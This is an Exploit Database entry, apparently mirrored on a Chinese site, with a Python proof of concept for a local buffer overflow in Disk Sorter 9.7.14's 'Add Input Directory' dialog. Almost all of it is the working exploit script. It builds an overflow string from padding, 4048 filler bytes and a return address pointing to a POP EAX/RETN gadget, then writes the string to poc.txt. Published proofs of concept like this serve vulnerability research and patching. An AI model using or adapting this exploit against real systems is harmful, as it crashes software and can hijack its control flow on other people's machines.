Disk Sorter 9.7.14 – ‘Input Directory’ Local Buffer Overflow (PoC)

• Exploit Database
• 13 阅读

• 作者： n3ckD_
  日期： 2017-06-02
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/42112/

• #!/usr/bin/python
  
  ######################################
  #	Exploit Title:		DiskSorter v9.7.14 - Input Directory Local Buffer Overflow - PoC
  # 	Date: 				25 May 2017
  # 	Exploit Author: 	n3ckD_
  #	Vendor Homepage:	http://www.disksorter.com/
  #	Software Link:		http://www.disksorter.com/setups/disksorter_setup_v9.7.14.exe
  #	Version:			Disk Sorter v9.7.14 (32-Bit)
  #	Tested on:			Windows 7 Enterprise SP1 (Build 7601)
  #	Usage:				Run the exploit, copy the text of the poc.txt into the 'Inputs -> Add Input Directory' dialog
  ######################################
  
  print "DiskSorter v9.7.14 (32-Bit) - Input Directory Local Buffer Overflow - PoC"
  print "Copy the text of poc.txt into the 'Inputs -> Add Input Directory' dialog"
  
  # in libspg:.text
  # 10147C1C 58 POP EAX
  # 10147C1D C3 RETN
  ret = "\x1c\x7c\x14\x10"
  
  nops = "\x47\x4F"*24
  buf = nops + "A"*4048 + ret + "MAGIC" + "\n"
  
  f = open("poc.txt","w")
  f.write(buf)
  f.close()